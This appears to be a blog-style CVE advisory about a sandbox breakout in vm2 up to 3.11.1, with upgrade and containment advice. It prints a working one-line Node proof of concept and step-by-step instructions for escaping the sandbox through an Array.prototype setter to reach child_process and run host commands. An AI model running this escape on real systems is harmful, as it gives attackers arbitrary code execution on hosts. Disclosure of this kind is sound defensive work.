VM2 prior to version 3.11.2 contains a sandbox breakout vulnerability. The newly introduced method neutralizeArraySpeciesBatch works with objects from the other (sandbox) side but can call back into sandbox-controlled code through an accessor defined on the array prototype. When a getter or setter is defined on Array.prototype inside the sandbox (the published proof of concept uses a setter on index 0), it is triggered during certain operations, and objects of the wrong side (host objects) are exposed to the sandbox. From any such host object an attacker can walk `.constructor.constructor` to the host `Function` constructor and escape the sandbox, because a function created by the host-realm `Function` constructor closes over the host global, where `process` lives. By chaining this access, arbitrary commands can be executed on the host system, as demonstrated by a proof of concept that runs `touch pwned` via child_process.execSync. The vulnerability is trivially exploitable with publicly available exploit code.
dailycve form
Platform: VM2
Version: ≤3.11.1
Vulnerability : Sandbox Breakout
Severity: Critical
date: 2026-05-03
Prediction: Patch 3.11.2
What Undercode Say:
Bash commands and codes related to the blog

Check installed vm2 version:
npm list vm2

Upgrade to patched version:
npm install vm2@3.11.2

Run the PoC to test (if vulnerable; it creates a file named pwned in the current directory):
node -e "const {VM}=require('vm2');new VM().run(`const a=[];Object.defineProperty(Array.prototype,0,{set(value){a.f=Buffer.prototype.inspect;value.arr.f.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch pwned');}});new Buffer(a);`)"
Exploit:
Define a setter on `Array.prototype[0]` that captures the host objects passed into it. Trigger the setter via `new Buffer(a)`, which routes a host-side array operation through the sandbox-defined accessor. From the captured host object, reach the host `Function` constructor via `.constructor.constructor`, obtain the `process` object, and execute arbitrary OS commands through `child_process`.
Protection from this CVE
Upgrade to vm2 3.11.2 immediately. If an immediate upgrade is impossible, run untrusted code inside low-privilege containers or VMs and restrict child process creation. A JavaScript-level sandbox is not a security boundary on its own once any host object becomes reachable, so the container or VM boundary is what actually limits the damage.
Impact:
Remote Code Execution (RCE) – an attacker who can run arbitrary JavaScript inside a vm2 sandbox can escape it and execute any command on the host machine.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

